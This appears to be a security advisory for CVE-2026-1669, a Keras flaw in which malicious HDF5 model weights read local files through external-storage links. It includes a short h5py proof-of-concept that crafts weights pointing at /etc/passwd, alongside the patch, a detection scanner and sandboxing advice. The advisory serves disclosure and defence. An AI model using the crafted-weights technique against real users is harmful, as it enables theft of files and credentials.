Model Poisoning: Turning Keras Weights into Weaponized File Readers
Vulnerability ID: CVE-2026-1669
CVSS Score: 7.1
Published: 2026-02-18
A high-severity Arbitrary File Read vulnerability in the Keras machine learning library allows attackers to exfiltrate sensitive local files (like /etc/passwd or AWS credentials) by embedding 'External Storage' links within malicious HDF5 model files. This affects Keras versions 3.0.0 through 3.13.1.
TL;DR
Keras blindly trusted HDF5 'external datasets' when loading models. Attackers can craft a .keras file where the model weights are actually pointers to local files on the victim's machine. When loaded, the model reads your secrets into memory as tensors.
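To make the mechanism concrete, here is a minimal sketch of the HDF5 external-storage primitive the attack relies on, written with h5py. The file name, dataset path, byte count, and target path are illustrative assumptions; a real malicious model wraps this inside an otherwise valid Keras weights file.

```python
import h5py

# Craft an HDF5 file whose "weight" dataset uses EXTERNAL storage,
# i.e. its bytes are read from a separate file on the machine that opens it.
with h5py.File("weights_with_external_link.h5", "w") as f:
    f.create_dataset(
        "dense/kernel",                     # hypothetical weight name
        shape=(64,),
        dtype="uint8",
        external=[("/etc/passwd", 0, 64)],  # (filename, offset, size): bytes come from the victim's file
    )

# On the machine that loads it, reading the dataset pulls in the target file's bytes:
with h5py.File("weights_with_external_link.h5", "r") as f:
    leaked = bytes(f["dense/kernel"][:])    # first 64 bytes of /etc/passwd
```

A vulnerable loader performs that read for the attacker when it materializes the dataset as a weight tensor, which the model or its serving wrapper can then leak back out.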
⚠️ Exploit Status: PoC
Technical Details
- CWE ID: CWE-73 (External Control of File Name or Path)
- CVSS v4.0: 7.1 (High)
- Attack Vector: Network / Local
- EPSS Score: 0.00039
- Exploit Maturity: Proof of Concept (PoC)
- Affected Component: keras.src.saving.saving_lib
Affected Systems
- Keras 3.0.0
- Keras 3.1.0
- Keras 3.13.1
- Any Python application using Keras to load untrusted models
- Keras >= 3.0.0, < 3.13.2 (fixed in 3.13.2)
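If you are unsure which builds are deployed, a quick version check can flag affected environments. A minimal sketch, assuming the third-party packaging library is installed:

```python
import keras
from packaging.version import Version

installed = Version(keras.__version__)
if Version("3.0.0") <= installed < Version("3.13.2"):
    print(f"Keras {installed} is in the affected range for CVE-2026-1669; upgrade to 3.13.2 or later.")
else:
    print(f"Keras {installed} is outside the affected range.")
```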
Code Analysis
The patch, commit 8a37f9d ("Fix checking for external dataset in H5 file"), adds a guard to the H5 weight-loading path that rejects any dataset backed by external storage:

```python
if dataset.external:
    raise ValueError("Not allowed: H5 file Dataset with external links")
```

With this check in place, a weights file whose datasets point outside the file fails to load with a ValueError instead of silently reading the referenced path into a weight tensor.
Exploit Details
- Giuseppe Massaro: Original PoC demonstrating local file inclusion via HDF5 external storage.
Mitigation Strategies
- Input Validation
- Sandboxing (see the subprocess sketch after this list)
- Dependency Management
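On the sandboxing point, one lightweight option is to load untrusted models in a separate, low-privilege process so a malicious file cannot read secrets available to the main application. The sketch below is illustrative and assumption-laden (it presumes Keras 3's keras.saving.load_model, a POSIX system, permission to switch to an unprivileged user, and a placeholder path "untrusted.keras"); it is not a complete sandbox.

```python
import subprocess
import sys

# Load the untrusted model in a throwaway child process running as an
# unprivileged user (requires the parent to be allowed to switch users,
# e.g. root inside a container).
result = subprocess.run(
    [sys.executable, "-c",
     "import keras; keras.saving.load_model('untrusted.keras')"],
    user="nobody",           # Python 3.9+: run the child as an unprivileged account
    capture_output=True,
    timeout=120,
)
if result.returncode != 0:
    print("Model load failed or was rejected:", result.stderr.decode(errors="replace"))
```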
Remediation Steps:
- Upgrade Keras to version 3.13.2 or later.
- Audit existing model pipelines to ensure untrusted models are not loaded with high privileges.
- Implement pre-loading checks using `h5dump` to scan for `EXTERNAL_FILE` headers in HDF5 files (a programmatic `h5py` variant is sketched below).
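The same pre-loading inspection can be done programmatically with h5py instead of h5dump. A minimal sketch, assuming the weights are in a plain HDF5 file (for the zip-based .keras format, extract model.weights.h5 first); the function name is illustrative:

```python
import h5py

def external_datasets(h5_path):
    """Return the names of datasets in an HDF5 file that use external storage."""
    flagged = []

    def visit(name, obj):
        # Dataset.external is a list of (filename, offset, size) tuples,
        # or None when the dataset's bytes live inside the file itself.
        if isinstance(obj, h5py.Dataset) and obj.external:
            flagged.append(name)

    with h5py.File(h5_path, "r") as f:
        f.visititems(visit)
    return flagged

# Example policy: refuse to load anything that points outside the file.
# if external_datasets("model.weights.h5"):
#     raise RuntimeError("Model weights reference external files; refusing to load.")
```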
References
Read the full report for CVE-2026-1669 on our website for more details including interactive diagrams and full exploit analysis.